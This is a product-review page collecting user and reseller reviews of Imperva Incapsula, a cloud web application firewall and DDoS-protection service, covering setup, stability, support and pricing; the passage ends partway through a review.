We just raised a $30M Series A: Read our story

Imperva Incapsula OverviewUNIXBusinessApplication

Imperva Incapsula is the #2 ranked solution in our list of top CDN tools. It is most often compared to Cloudflare: Imperva Incapsula vs Cloudflare

What is Imperva Incapsula?

Imperva Incapsula is a cloud-based application delivery service that protects websites and safeguards web applications and their data from attacks, and improves their performance by enhancing user experience. Incapsula includes a security platform with a web application firewall, DDoS mitigation, content delivery network, and global load balancer to maximize performance.

Imperva Incapsula is also known as Incapsula.

Imperva Incapsula Buyer's Guide

Download the Imperva Incapsula Buyer's Guide including reviews and more. Updated: October 2021

Imperva Incapsula Customers

Hitachi, BNZ, Bitstamp, Moz, InnoGames, BTCChina, Wix, LivePerson, Zillow and more.

Imperva Incapsula Video

Archived Imperva Incapsula Reviews (more than two years old)

Filter by:
Filter Reviews
Industry
Loading...
Filter Unavailable
Company Size
Loading...
Filter Unavailable
Job Level
Loading...
Filter Unavailable
Rating
Loading...
Filter Unavailable
Considered
Loading...
Filter Unavailable
Order by:
Loading...
  • Date
  • Highest Rating
  • Lowest Rating
  • Review Length
Search:
Showingreviews based on the current filters. Reset all filters
MS
Director Of Hosting Services at a tech services company with 51-200 employees
Reseller
Offers good protection for our customer's and the interface is user-friendly

Pros and Cons

  • "I like the user-friendly interface."

    What is our primary use case?

    We mainly use this solution as a web application firewall. We have CMS systems in our portfolio, which our customers use, and the full information portraits are running on our infrastructure and in our CMS product. We, therefore, use this solution mainly for protection and to improve performance.

    What is most valuable?

    I found that it is very easy to set everything up. I like the user-friendly interface.

    What needs improvement?

    I think the pricing needs some tweaks. 

    What do I think about the stability of the solution?

    Imperva Incapsula is a very stable solution.

    What do I think about the scalability of the solution?

    We use this solution as a crowd solution, a software service so we don't have any issues regarding its performance or scalability. Our IT administrators use Incapsula to maintain the solution because they have knowledge about how this protection works.

    How are customer service and technical support?

    I am satisfied with the customer service. The few times that we had issues, they technical support team was able to solve our issues. 

    How was the initial setup?

    The initial setup was very easy and straightforward. Our customers need good protection so we do the installation for them to protect our sites. 

    What about the implementation team?

    We are resellers and in addition to supplying the product, we also offer support. 

    Which other solutions did I evaluate?

    We compared this with other solutions like Akamai, but it couldn't deliver the same as Imperva Incapsula. We don't use specific application tweaks. We only use basic mechanisms of cashing and six years ago, when we were looking for a solution, there was no solution like this one out there. Incapsula does what we need it to do, and we like the easy installation process. We think still that Incapsula is the best.

    What other advice do I have?

    Because we are resellers, we prefer that our customers use it. But even if I wasn't a reseller, I would still recommend it. I love the solution's capabilities and the ease of the installation. 

    In the future, I would like to see better pricing. E.x. the additional bandwidth packages are higher than our needs so we end up paying for data that we don't use. I want them to provide me with the particular quantity of megabytes I need. I don't want to pay extra money for megabytes that I will not use in the future.

    I rate this program nine out of ten.

    Disclosure: My company has a business relationship with this vendor other than being a customer: Reseller.
    Joakim Sörqvist
    Senior Systems Engineer - Channel Manager at Exclusive GRP
    Reseller
    A solution that's easy to implement, but doesn't offer local support

    Pros and Cons

    • "They're quite easy to install and quite easy to set up. Clients really like that. Especially when you're dealing with the cloud, it's really easy."
    • "We would like them to hire people in Sweden because it's quite hard when people are sitting in the UK or Belgium because some of the customers really want them to be local."

    What is our primary use case?

    The solution increases the amount of protection for a client's products and solutions in their country.

    What is most valuable?

    They're quite easy to install and quite easy to set up. Clients really like that. Especially when you're dealing with the cloud, it's really easy. 

    It also has the ability to integrate with other firewalls. That's really important today. Most end-users are looking for something that can integrate with other solutions and with APIs. They're looking for solutions that have an open API. 

    What needs improvement?

    The solution needs to ensure they are compliant and can show the customer in a visual way, like a ticked box, that they are protected. They need to ensure their solution is showcasing if their system is getting attacked so clients know if or when they are under attack.

    Clients also often complain about the cost of the solution. They should consider adjusting their pricing models.

    We would like them to hire people in Sweden because it's quite hard when people are sitting in the UK or Belgium because some of the customers really want them to be local.

    In the next version, they could include more products or more solutions in this solution that you can add on. They need to build more features that they can add so they can help the customers who don't have a particular solution in hand. Most of the end-users are looking for an easy way to manage all of their solutions. Today we're selling a lot of smaller solutions, and they need to have a lot of different management solutions that we can offer to clients. 

    For how long have I used the solution?

    I've been selling the solution for 1.5 years.

    What do I think about the stability of the solution?

    The solution is really stable. It's good. It's a product that I can stand by and recommend because I know it's going to work for the customer.

    What do I think about the scalability of the solution?

    The scalability is good, especially when you sell a solution that's in the cloud. That's easier to scale; you can just upgrade it. 

    How are customer service and technical support?

    We don't directly deal with technical support, but I've never heard of any problems or complaints from clients.

    How was the initial setup?

    The initial setup is straightforward.

    What about the implementation team?

    We deploy the solution for our client. Sometimes Imperva also assists.

    What's my experience with pricing, setup cost, and licensing?

    The licensing depends on the client. Usually, it's yearly, but we do offer monthly financing.

    The only thing I hear complaints about is that in some cases clients want to be able to scale down. They don't want to buy everything. That could be, in Sweden anyway, a big problem, because they need to buy more licenses than they will use. In some cases, some of the resellers would like if it was possible to scale down, to have smaller option. However, they don't have that.

    What other advice do I have?

    I'm a distributor for this product.

    With the ease of implementation, I think is a good product. A lot of the other products need a lot of professional services to make it work. With this solution, it's very, very easy to implement, which is a strong selling point.

    They also have a good range of products that they sell.

    I would rate the solution seven out of ten. It's more than one issue that has me rating it at seven. It's quite a big solution, so it's hard to get a smaller company to buy it. They don't have people in Sweden either. That's really important for us, because it's harder for Swedish companies to be serious about the product when there's a lot of other vendors that have local people, and that's preferred by clients.

    Disclosure: My company has a business relationship with this vendor other than being a customer: Reseller.
    Learn what your peers think about Imperva Incapsula. Get advice and tips from experienced pros sharing their opinions. Updated: October 2021.
    541,108 professionals have used our research since 2012.
    AjayJawla
    Technical Sales Director at Revere Technologies
    Reseller
    Protects your network environment from threats and defends your infrastructure from malicious behaviors

    Pros and Cons

    • "This product is a reliable defense from malicious attacks on a network environment."
    • "Analytics in the area of risk need to be improved to supply more information to the users for creating better environments."

    What is our primary use case?

    The primary use is the protection of our environment and client environments from intrusion and malicious attacks.

    How has it helped my organization?

    The product improves our organization by defending infrastructures from malicious behaviors. It also allows us to provide a reliable product to our clients who need a similar solution.

    What is most valuable?

    The most valuable features for our organization are auditing capabilities and compliances. The product meets the needs of our business model and we can see the health of the architecture at a glance. There are some instances where a client needs to meet with compliances in their industry, and this product is capable of meeting those needs.

    What needs improvement?

    One thing that they really could improve on is the depth of the analytics. The company needs to think more about the risk and analytic side of the application to supply the user with more information to evaluate and use in resolving issues. It is good to be able to depend on the product to provide a reliable solution, but it is better to take steps to resolve issues overall. This means giving information to the user that will help them identify exactly what the issues are. Risk analytics need to improve and this can be done easily.

    For how long have I used the solution?

    We have been using the solution for more than five years.

    What do I think about the stability of the solution?

    This is a very stable product. Our clients have never complained about downtime or issues with functionality.

    What do I think about the scalability of the solution?

    The product is easily scalable. We currently work with five to six customers who are on this solution. They are organizations of mixed size from small to enterprise. There is no problem adjusting the scale up or down to meet their needs and budget.

    How are customer service and technical support?

    We have not needed to have much interaction with the support teams but when we do they address the problem quickly and with a high level of accuracy. The support, in my opinion, is very good.

    How was the initial setup?

    Deployment is always straightforward. You just follow the instructions. With our experience, the product takes very little time to install and configure.

    What about the implementation team?

    As we are a partner and a reseller, we are familiar with the product we do the installations for clients ourselves. We rarely have any issues with the installations.

    What other advice do I have?

    On a scale from one to ten where one is the worst and ten is the best, I would rate the Incapsula platform as somewhere between an eight to nine. The obvious fault is the lack of better reporting. However, it is a good, functional product and we recommend it to clients who will not have to do very much to maintain the product.

    Disclosure: My company has a business relationship with this vendor other than being a customer: Reseller.
    BM
    Sr Associate Information Security at a tech services company with 51-200 employees
    Real User
    A stable solution with good DDoS protection and recently improved technical support

    Pros and Cons

    • "Scalability is pretty easy on the base platform. You just add another, and you're ready to go."
    • "The solution needs to improve Integration with third parties for their on-prem deployment models. The integration is not that good yet."

    What is most valuable?

    The solution has good DDoS protection, and some good common features, such as no attack surfaces, parameter sanitization, and attack analytics.

    What needs improvement?

    The dashboard of the solution is complex. It is complex in the sense that there are too many options. There are two types of Incapsula dashboards. One is the on-prem version and one is cloud-based. Cloud-based is okay. The on-prem one needs some work.

    The solution needs to improve Integration with third parties for their on-prem deployment models. The integration is not that good yet.

    For how long have I used the solution?

    I've been using the solution for one year.

    What do I think about the stability of the solution?

    The solution is stable.

    What do I think about the scalability of the solution?

    Scalability is pretty easy on the base platform. You just add another, and you're ready to go. We deal mostly with enterprise-level clients.

    How are customer service and technical support?

    The company has really improved its technical support over the past year. Before that, I wouldn't rate them as very good, but they are much better now.

    How was the initial setup?

    The difficulty of the initial setup depends on the customer. If it's a complex environment that they're processing, and/or if there's a downtime period, it may take more or less time. It depends on the number of applications that we have to integrate as well. 

    What other advice do I have?

    We are Imperva partners, so we work with clients that use different deployment models, including on-premises and cloud.

    I'd recommend to those considering implementation to look at your organization's requirements and then compare your options.

    I would rate the solution 7.5 or eight out of ten.

    Disclosure: My company has a business relationship with this vendor other than being a customer: Partner.
    Sylvio Neto
    Information Security Analyst at a tech vendor with 10,001+ employees
    Real User
    Gives us visibility into DDoS, SQL Injection and other types attacks

    Pros and Cons

    • "Provides Anti-DDoS protection, as well as other protections like SQL injection, Cross-Site Scripting, and antiscanner. These types of protection are valuable to the business due to the daily attacks on our portals, and that often cannot be seen without a tool like this."
    • "Setup was straightforward, very simple. I only entered the domain and Incapsula returned the DNS data that I needed to change for the protection to be configured."
    • "Imperva now offers add-ons to add functionality, but I would like to see these included in the product, even if it would cost more."

    What is our primary use case?

    The first use case was due to the need to protect DDoS attacks as well as protection for SQL injection. The existing application was no longer supported, and to prevent further attacks from occurring, WAF Imperva was applied. The rollout was very fast due to the need for DNS notes only.

    How has it helped my organization?

    In the old days, we experienced many problems with denial of service attacks, and identifying them was very difficult because we did not have a WAF solution. After the deployment, the solution gave us the visibility we needed.

    What is most valuable?

    Anti-DDoS protection, as well as other protections like SQL injection, Cross-Site Scripting, and antiscanner. These types of protection are valuable to the business due to the daily attacks on our portals, and that often cannot be seen without a tool like this.

    What needs improvement?

    Imperva now offers add-ons to add functionality, but I would like to see these included in the product, even if it would cost more.

    For how long have I used the solution?

    One to three years.

    What do I think about the stability of the solution?

    No issues with stability.

    What do I think about the scalability of the solution?

    No issues with scalability.

    How are customer service and technical support?

    Very good, although I have not had any problems so far.

    Which solution did I use previously and why did I switch?

    No, this is the first solution I have used.

    How was the initial setup?

    It was straightforward, very simple. I only entered the domain and Incapsula returned the DNS data that I needed to change for the protection to be configured.

    Which other solutions did I evaluate?

    I did not participate in the process of choosing the solution.

    What other advice do I have?

    Only configure it by enabling all protections. This is very important for preventing attacks.

    Disclosure: I am a real user, and this review is based on my own experience and opinions.
    it_user818130
    System Administrator at a tech services company with 51-200 employees
    Real User
    We have peace of mind that nobody will use malware on us or try to hack our website

    Pros and Cons

    • "On the site security, I can see which countries have incidents, whether it was a robot attack, a real human user, or non-human user."
    • "On the activity log, I can see the exact details, the visit, and the threat."
    • "The dashboard is good and user-friendly."
    • "On the real time, you can see live traffic, which is flowing into our website."
    • "I am not sure if this application has a policy where you can create your custom policy and run it as our firewall. We should have some ability to also create some custom policy, then run it as a firewall."

    What is our primary use case?

    We use Incapsula as a firewall on our website which can block any suspicious attempts from the outside of the company. For example, if someone is trying to hack our website or put malware on it, it blocks them.

    How has it helped my organization?

    When I joined the company, one of our websites was hacked by malware (somebody put it on our website). The website went down for a long time. It took two weeks to clear the server and move everything: all the content, clean it, bring it up, and start again. By using this application, the firewall is blocking every suspicious activity and event. Now, we are safe. We have peace of mind that nobody will use malware on us or try to hack our website. With this application, we have some peace of mind that everything is blocked by Incapsula. 

    What is most valuable?

    1. I like to see the security. On the site security, I can see which countries have incidents, whether it was a robot attack, a real human user, or non-human user. For this feature, I like it because I can see information quickly without going into long logs and details. It is very comprehensive regarding what is going on behind the scenes on the website traffic.
    2. The option saying activity launch. On the activity log, I can see the exact details, the visit, and the threat. If I click on the details, it shows me exactly where it came from, who the user agent is, and what page they tried to enter. Then, it gives me the session. Also, I have the option to put them on the blacklist or the white list. Therefore, I like this option because it is more detailed. If someone causes more than one of the incidents, then they are maybe suspicious, and we want to learn more about it. Here we can get the data, and under the data, we can see the IP addresses, therefore tracking and copying that IP address and putting it under IP lookup.
    3. The dashboard is good and user-friendly. You can easily understand it, even if you don't have any prior knowledge. Looking at it, you can easily see what is happening because it is a very user-friendly menu and user interface. I don't come from this exact background, but it seems I am supposed to manage and work with this stuff. Because of the user interface, I can understand even without having prior knowledge or education of it.
    4. The real-time option is cool as well. On the real time, you can see live traffic, which is flowing into our website. 

    What needs improvement?

    I am not sure if this application has a policy where you can create your custom policy and run it as our firewall. We should have some ability to also create some custom policy, then run it as a firewall. Maybe it is not relevant, but I think this would be a good option.

    Some things previously happened where we moved one of our websites to a new host and new server, then we had difficulty putting in our user credentials to Incapsula because we could not find them. My boss was aggravated with the issue. I believe he contacted Incapsula and found out how to use the credentials for the website. They had changed the user interface a couple months ago. It was different than now. We had to put some information from the website domain to Incapsula login order to activate it, because they had changed the user interface.

    For how long have I used the solution?

    One to three years.

    What do I think about the stability of the solution?

    It is a stable product.

    What do I think about the scalability of the solution?

    It is not used at a high level, but we just put it in and configured it with our website. So, for the things that we have to run, it works just fine. I have no idea about any other scalability. However, it is just fine for the reason that we are using it.

    How are customer service and technical support?

    I have never had a ticket with technical support, but I believe that they are supportive.

    Which solution did I use previously and why did I switch?

    I was not involved with any solution in the company prior to Incapsula. When I came to this company, we were using this solution.

    How was the initial setup?

    Someone else set it up.

    Disclosure: IT Central Station contacted the reviewer to collect the review and to validate authenticity. The reviewer was referred by the vendor, but the review is not subject to editing or approval by the vendor.
    ITCS user
    Manager Business Development at Seguridad América
    Real User
    The complete solution is valuable for everything it delivers and the protection it offers.

    Pros and Cons

    • "The complete solution is valuable for everything it delivers and the protection it offers."
    • "An improvement has been to our website: It increases the speed of our response, the capacity of the site, and optimizes the bandwidth.​"
    • "​Technical support provides good, quick responses."

      How has it helped my organization?

      An improvement has been to our website: It increases the speed of our response, the capacity of the site, and optimizes the bandwidth.

      What is most valuable?

      More than features, the complete solution is valuable for everything it delivers and the protection it offers.

      What needs improvement?

      Acquire it for all the benefits that this solution brings to organizations, especially nowadays, when we live in a technological era where the speed and response times of the different websites are valued so much.

      For how long have I used the solution?

      One to three years.

      What do I think about the stability of the solution?

      Never.

      What do I think about the scalability of the solution?

      None.

      How are customer service and technical support?

      Technical support provides good, quick responses.

      Which solution did I use previously and why did I switch?

      No.

      How was the initial setup?

      Initial setup is very simple, since it is enough to change the servers in and out of the site to make it work.

      What's my experience with pricing, setup cost, and licensing?

      Although the pricing can be a little high, it is worth the protection and security that it offers.

      Which other solutions did I evaluate?

      I only saw Cloudflare and Akamai, but the latter is very expensive.

      What other advice do I have?

      It is an excellent product.

      Disclosure: My company has a business relationship with this vendor other than being a customer: Partner.
      ITCS user
      Security Consultant at a security firm with 501-1,000 employees
      Consultant
      Gives us the ability to differentiate between a positive and a false-positive intruder action

      Pros and Cons

      • "Gives us the ability to trace each connection, and to have logs to be able to differentiate between a positive and a false-positive intruder action."
      • "I miss being able to integrate the dashboard with other BI tools we are using. We have to export and import data to be able to present it, and doing so is a lot of work."

      How has it helped my organization?

      It helped us to define wherever there was illicit traffic between our webs, and improved the control we achieved.

      What is most valuable?

      The ability to trace each connection, and to have logs to be able to differentiate between a positive and a false-positive intruder action.

      It is handy to retrieve and download the logs to line up separate actions to identify possible intruder behaviour.

      What needs improvement?

      At that moment, I miss being able to integrate the dashboard with other BI tools we are using. We have to export and import data to be able to present it, and doing so is a lot of work.

      For how long have I used the solution?

      One to three years.

      What do I think about the stability of the solution?

      Not at all. 

      It was a bit pointless to know how many sites were offline every time a spot in the world decided to do maintenance, but we like it as we can handle worldwide issues, knowing what is going on there.

      What do I think about the scalability of the solution?

      No issues at all, it fulfills our expectations in terms of scalability.

      How are customer service and technical support?

      Great.

      Which solution did I use previously and why did I switch?

      We had used many local, and some cloud-based solutions (like Azure, Advanced Nagios, Centreon). We switched for the scalability of the solution, the reporting features it has, as well as the availability to fine tune the solution. 

      How was the initial setup?

      It was straightforward, but we had to fine tune it.

      The initial setup blocked some cookies and data from our scrapers which, they said, they never received from us. We investigated and found the WAF was blocking them. It was a lot of work.

      What's my experience with pricing, setup cost, and licensing?

      It's worth it. It's a fine solution for medium/big companies worried about attacks that happen in the wild.

      Which other solutions did I evaluate?

      Centreon and Azure.

      What other advice do I have?

      My best advice could be, if you don't have the staff to carry out security in a proper way, have a tool do it, but use a specialized tool like this one, and don't re-invent the wheel.

      Also, in our case, we soon realized that we needed an expert to fine tune it and to obtain all the features we wanted.

      Disclosure: I am a real user, and this review is based on my own experience and opinions.
      MS
      Head Of Information Security at IronFX Global Limited
      Real User
      We are able to bring a new website live within minutes, without false positive alerts

      Pros and Cons

      • "IncapRules is one of the most valuable features, as you can create your own security and access control rules on top of your security policy. Using IncapRules we were able to easily block Layer 7 DDoS attacks several times."
      • "Real-time monitoring is also a great tool, as you may watch several parameters in real time."
      • "Incapsula takes care of the CDN infrastructure and bandwidth volume, providing several enterprise "load balancing" features."
      • "It would be better if we were able to manage and apply changes to multiple websites/web applications, and search WAF logs for multiple websites, via the Incapsula dashboard."

      How has it helped my organization?

      There is no need to have an in-house WAF to manage and maintain. We are now able to bring a new website live within minutes, without false positive alerts. It has Improved user/customer experience and website performance.

      What is most valuable?

      IncapRules is one of the most valuable features, as you can create your own security and access control rules on top of your security policy. Using IncapRules we were able to easily block Layer 7 DDoS attacks several times.

      Real-time monitoring is also a great tool, as you may watch several parameters in real time.

      What needs improvement?

      It would be better if we were able to manage and apply changes to multiple websites/web applications, and search WAF logs for multiple websites, via the Incapsula dashboard.

      For how long have I used the solution?

      Three to five years.

      What do I think about the stability of the solution?

      The first year we faced one or two incidents, but since then we not had any stability issues.

      What do I think about the scalability of the solution?

      No issues with scalability. You need not worry about scalability. Incapsula takes care of the CDN infrastructure and bandwidth volume, providing several enterprise "load balancing" features.

      How are customer service and technical support?

      Incapsula’s support personnel is very good, positive, and most of them passionate. Sometimes a second-level support might be required for more complex requests. Additionally, you may see a slight delay in replying to support tickets, but you are able to contact them via phone for critical cases and prompt response.

      Which solution did I use previously and why did I switch?

      We were using Akamai and we switched to Incapsula mainly due to the WAF effectiveness and total cost.

      How was the initial setup?

      Not only the initial, but also the final setup, is straightforward.

      What's my experience with pricing, setup cost, and licensing?

      For enterprise contracts you will be in touch with a dedicated account manager who will guide you regarding licensing.

      Which other solutions did I evaluate?

      We evaluated Akamai. Akamai had a bigger CDN network and probably better performance worldwide (especially on the Chinese mainland) but their WAF is very pure and not effective at all.

      What other advice do I have?

      Go for it and request a free trial.

      Disclosure: I am a real user, and this review is based on my own experience and opinions.
      ITCS user
      System Administator at a tech services company with 201-500 employees
      Consultant
      With the WAF, our web services can't be exploited remotely.

      What is most valuable?

      • DDoS protection
      • CDN
      • WAF
      • Good API for managing services

      How has it helped my organization?

      Thanks to Incapsula, we got easily manageable DDoS protection; HTTP2 and SSL certificates for all the services; CDN in good locations; and we're now sure that our web services can't be exploited remotely because of the WAF feature. Also, we can chose to whitelist/blacklist network(s) access to specific services/resources.

      For how long have I used the solution?

      I have used it for a few years.

      What was my experience with deployment of the solution?

      We have not encountered any deployment issues.

      What do I think about the stability of the solution?

      We had a few hiccups in the past, but they were small with no impact to important services.

      What do I think about the scalability of the solution?

      We have not encountered any scalability issues.

      How are customer service and technical support?

      They need to work on the customer support; in my opinion, this is their weakest point. Some of their support representatives really have no idea how their service works.

      Which solution did I use previously and why did I switch?

      We did not previously use a different solution.

      What about the implementation team?

      An in-house team implemented it.

      Which other solutions did I evaluate?

      Before choosing this product, we did not evaluate other options.

      What other advice do I have?

      Try it.

      Disclosure: I am a real user, and this review is based on my own experience and opinions.
      ITCS user
      Application Security Architect at a hospitality company with 10,001+ employees
      Vendor
      The WAF can identify, block, whitelist or blacklist as needed.

      What is most valuable?

      Hands down, the WAF is the most valuable feature; being able to identify, block, whitelist or blacklist as needed, are all valuable.

      How has it helped my organization?

      We now have visibility into our traffic in a scope that we never had before, especially being able to review bot vs human traffic and country of origin.

      What needs improvement?

      Reporting and the main Sites dashboard could use refinement. We have a lot of sites, and scrolling through the dashboard becomes cumbersome.

      For how long have I used the solution?

      I have used it for six months.

      What was my experience with deployment of the solution?

      The only deployment issue we encountered was getting Incapsula and Akamai to play nice. However, the Incapsula engineers were very helpful in helping us configure our sites in the WAF correctly.

      What do I think about the stability of the solution?

      We have not encountered any stability issues.

      What do I think about the scalability of the solution?

      We have not encountered any scalability issues.

      How are customer service and technical support?

      Customer Service:

      I have yet to need customer service.

      Technical Support:

      I rate the level of technical support as very high.

      Which solution did I use previously and why did I switch?

      We had not used a WAF before deploying Incapsula.

      How was the initial setup?

      The setup was straightforward and simple.

      What about the implementation team?

      We implemented it ourselves with the guidance of the Incapsula team.

      What was our ROI?

      It is too soon to tell regarding ROI.

      What's my experience with pricing, setup cost, and licensing?

      Know your bandwidth requirements.

      Which other solutions did I evaluate?

      Before choosing this product, we evaluated so, so, so many other options.

      Disclosure: I am a real user, and this review is based on my own experience and opinions.
      Syed Ubaid Ali Jafri
      Manager Security Operation Center at Engro Corporation
      Real User
      Top 20
      I like the content monitoring feature which I haven't seen in other WAF solutions.

      What is most valuable?

      Content monitoring is a marvelous feature that I haven't seen in other Web Application Firewalls. It also has a good content filter. We do a lot of penetration testing on our servers, and the Imperva standalone solution for identifying a payload and its signature by deep analysis was very good.

      How has it helped my organization?

      We never used to know about threat and attack signatures. By using Imperva WAF, we could identify our weak points where an attacker was trying to gain access.

      What needs improvement?

      They could improve by minimizing false positive results. Although this occurs less with Imperva, we would like to see some further improvements.

      We have been using this product for last 1 years, it's result is very impressive. But due to the excessive load on the Web site where thousands of requests‎ are generated from legitimate users, however the request in which any sequential or specialised characters are requested would be directly blocked by impreva . Currently imperva blocks the special character request generated from the user, as I conduct a test where I am parsing the encoded html values of the same special characters to the input field, imperva bypasses these encoded values for example : ' i.e. %27 or / i.e %2F, the WAF bypasses these encoded characters. I hope that this device should have a capability to detect the pattern which is associated with Xss or Xsrf, rather then by not blocking the request which contains any special characters.

      For how long have I used the solution?

      I have used it for one year.

      What do I think about the stability of the solution?

      ‎We did not encounter any stability issues.

      What do I think about the scalability of the solution?

      We never encountered any scalability issues.

      How are customer service and technical support?

      We were impressed with the technical support.

      Which solution did I use previously and why did I switch?

      We have examined different vendor WAF solutions but this solution was unique.

      How was the initial setup?

      Initial setup was straightforward.

      What's my experience with pricing, setup cost, and licensing?

      Pricing was a little higher but when compared to performance; it's very cheap.

      Which other solutions did I evaluate?

      ‎We evaluated Akamai and F5.

      What other advice do I have?

      Imperva Incapsula WAF is an awesome solution for implementing a WAF with good support and reliable hardware performance.

      Disclosure: I am a real user, and this review is based on my own experience and opinions.
      it_user569916
      Network and Security Engineer at a consumer goods company with 1,001-5,000 employees
      Vendor
      The dashboard shows us traffic, security, and real-time utilization. The default configuration usually does the trick for us.

      What is most valuable?

      • Very easy to configure, which quickly allows us to add significant security to our websites.
      • Nice dashboard, which shows us details about traffic, security, performance, real-time utilization and an activity log.
      • Easy to configure caching, content optimization and other advanced settings, which allows us to improve the customer experience if necessary, or keep the defaults if any change is unnecessary.

      How has it helped my organization?

      With our IT infrastructure more secure, our customers receive a great website experience without encountering website defacements and other fallout from attacks on our web servers. Our IT department is not spending the time we used to on website remediation after attacks.

      What needs improvement?

      An Incapsula website configuration instance can be in a "Pending DNS changes" state, where further work is needing to be done by the customer, while website access is otherwise fully functional. While in this state, the PCI Compliance Report for the website in question, which I have set to email me monthly, doesn't get generated and sent. Imperva should decouple the "Pending DNS changes" state from the process that periodically emails the PCI Compliance Report. Until that happens, the workaround is to manually generate the report monthly.

      For how long have I used the solution?

      Since May 2014.

      What do I think about the stability of the solution?

      We haven’t had any stability issues. I get emails about internal Incapsula technical issues that they’re working on. However, they haven’t ever impacted me as an administrator and I’m unaware of any customers experiencing issues getting to our websites.

      What do I think about the scalability of the solution?

      Incapsula scales nicely.

      How are customer service and technical support?

      Technical support is excellent.

      Which solution did I use previously and why did I switch?

      Prior to Incapsula, we only used inline IPS, anti-virus, etc. Incapsula is our first web application firewall.

      How was the initial setup?

      Initial setup was very easy. The default configuration usually has done the trick for us. We simply haven’t needed to deviate much from default. Online documentation is good and if we still had questions, we contacted support who helped us make configuration changes to address our needs.

      What's my experience with pricing, setup cost, and licensing?

      Gain an understanding of pricing for the various advanced features and figure out what features you need to meet your objectives. We have done very well with the first tier feature package to address the needs at our two data centers and our cloud environments.

      Which other solutions did I evaluate?

      We got a feel for pricing and capabilities of other competing systems. However, Incapsula came highly recommended by our trusted security VAR as they had many customers who experienced great results with it. With that ringing endorsement, and the reasonable cost, we tried it out, loved it, and have been using it ever since.

      What other advice do I have?

      Do a proof-of-concept. It’s quick and easy to set up, and you’ll have Incapsula support to help you if needed. Embrace the ease-of-use of the administrative interface and marvel “can a WAF really be this easy?!”. Monitor the dashboard and enjoy the results. The ease of testing Incapsula and then implementing it into production is one of the most remarkable product experiences in my IT career. It’s clear that Incapsula engineers are busy behind the scenes, which is in contrast to my appreciation of what I would otherwise be doing tuning other WAF options.

      Disclosure: I am a real user, and this review is based on my own experience and opinions.
      ITCS user
      Service Manager at a tech services company with 51-200 employees
      Consultant
      Provides PCI-level IDS/IPS.

      What is most valuable?

      Easy-to-set-up CDN with PCI-level IDS/IPS

      How has it helped my organization?

      We offer Incapsula for every customer project we host, as a default.

      What needs improvement?

      The default service is great!

      For how long have I used the solution?

      I have used it for two years.

      What was my experience with deployment of the solution?

      Sometimes, the SSL setup can be a bit slow/inconsistent.

      What do I think about the stability of the solution?

      There was only one minor incident with service availability, if I remember correctly.

      What do I think about the scalability of the solution?

      Nope; we have not encountered any scalability issues.

      How are customer service and technical support?

      Customer Service: Some tickets seem to hang for some reason and some…

      What is most valuable?

      • Easy-to-set-up CDN with PCI-level IDS/IPS

      How has it helped my organization?

      We offer Incapsula for every customer project we host, as a default.

      What needs improvement?

      The default service is great!

      For how long have I used the solution?

      I have used it for two years.

      What was my experience with deployment of the solution?

      Sometimes, the SSL setup can be a bit slow/inconsistent.

      What do I think about the stability of the solution?

      There was only one minor incident with service availability, if I remember correctly.

      What do I think about the scalability of the solution?

      Nope; we have not encountered any scalability issues.

      How are customer service and technical support?

      Customer Service:

      Some tickets seem to hang for some reason and some of the more-technical tickets seem to go through lot of different people before they get solved, but generally the customer service has been good.

      Technical Support:

      General documentation is good enough that we haven't needed technical support that much, but the answers have been good once you go through the "Off-the-shelf" answers.

      Which solution did I use previously and why did I switch?

      We did try CloudFlare, but the pricing didn't suit our use case too well.

      How was the initial setup?

      The initial setup is fairly straightforward for a technical person.

      What about the implementation team?

      An in-house team implemented it all the way.

      What was our ROI?

      ROI is ~90%.

      What's my experience with pricing, setup cost, and licensing?

      Pricing is a good match for the features we use.

      Which other solutions did I evaluate?

      Before choosing this product, we also evaluated CloudFlare because it appeared first in Google.

      What other advice do I have?

      Basic setup is simple but, as with any caching/WAF setup, there are tricks you need to learn. But it works really nice out of the box!

      Disclosure: I am a real user, and this review is based on my own experience and opinions.
      Sudesh Kumar Bhadouria
      Technical Consultant at a tech services company with 10,001+ employees
      Consultant
      Provides valuable cache control features like cache purging and cache rule propagation. The dashboard is not accessible on occasion.

      What is most valuable?

      • Extensive cache control like cache purging and cache rule propagation
      • Availability features
      • Cross-datacenter solution (active and passive environments)
      • CDN and DDoS protection with 24/7 support

      How has it helped my organization?

      Automatic failover between primary and secondary sites enables high availability and accelerates disaster recovery. As soon as it detects that the primary site has gone down, it automatically kick-starts our standby data center.

      What needs improvement?

      The dashboard is not accessible on occasion. This is probably due to a high load. However, the sites’ protection seems intact.

      For how long have I used the solution?

      We have been using this solution for four years.

      What do I think about the stability of the solution?

      There are no stability issues as of now.

      What do I think about the scalability of the solution?

      There are no scalability issues, but the custom SSL has a terrible price point that puts it out of range for our clients. If they need custom or EV SSL, they are paying significantly more than their overall hosting.

      How are customer service and technical support?

      The technical support is impressive.

      Which solution did I use previously and why did I switch?

      We used Akamai previously, but due to full PCI DSS compliance, we needed a proprietary solution for two-factor authentication. We then switched to Incapsula.

      How was the initial setup?

      The setup was so straightforward. It didn’t require to us to make any major changes.

      What's my experience with pricing, setup cost, and licensing?

      If you don't have custom SSL, get it!

      Which other solutions did I evaluate?

      We switched to Incapsula from Akamai.

      What other advice do I have?

      Imperva has a very impressive core feature set. Imperva has made security analysts scratch their heads. We allow them in from the inside so they can actually hit something worthwhile.

      We are very confident in the reports we get from Imperva. Its bot identification has allowed us to plan bandwidth appropriately.

      Identification for good bots (people who hit our site using automation, but for good business reasons) has allowed us to work with our customers who use our services in new ways.

      Disclosure: I am a real user, and this review is based on my own experience and opinions.
      it_user574089
      Security Architect at a financial services firm with 501-1,000 employees
      Vendor
      The anti-DDoS protection has distributed nodes around the world.

      What is most valuable?

      Infrastructure protection (anti-DDoS): Imperva anti-DDoS protection has the well-known value of having lots of distributed nodes around the world, making it the best value for DDoS protection. They also include protection against almost all known DDoS attack methods.

      How has it helped my organization?

      The product has given us DDoS protection.

      What needs improvement?

      The management interface needs improving. Even with a recent version of the interface, you cannot do all the changes that you would like. As an example, if you want to change one of your protected public IP addresses, you need to request this from support, and it takes a long time.

      For how long have I used the solution?

      I have used it for 10 months.

      What do I think about the stability of the solution?

      There were stability issues. One node went down and we completely lost the connectivity of our public IP addresses.

      What do I think about the scalability of the solution?

      We have not encountered any scalability issues.

      How are customer service and technical support?

      We rate technical support as really bad. It took one month to solve an issue with one node and give us an alternative solution. Apart from the management interface, support service has to improve their response times (based on our experience with them).

      Which solution did I use previously and why did I switch?

      We did not previously use any other solutions.

      How was the initial setup?

      Initial setup was simple, except for the GRE tunnel issues and MTU tuning.

      What's my experience with pricing, setup cost, and licensing?

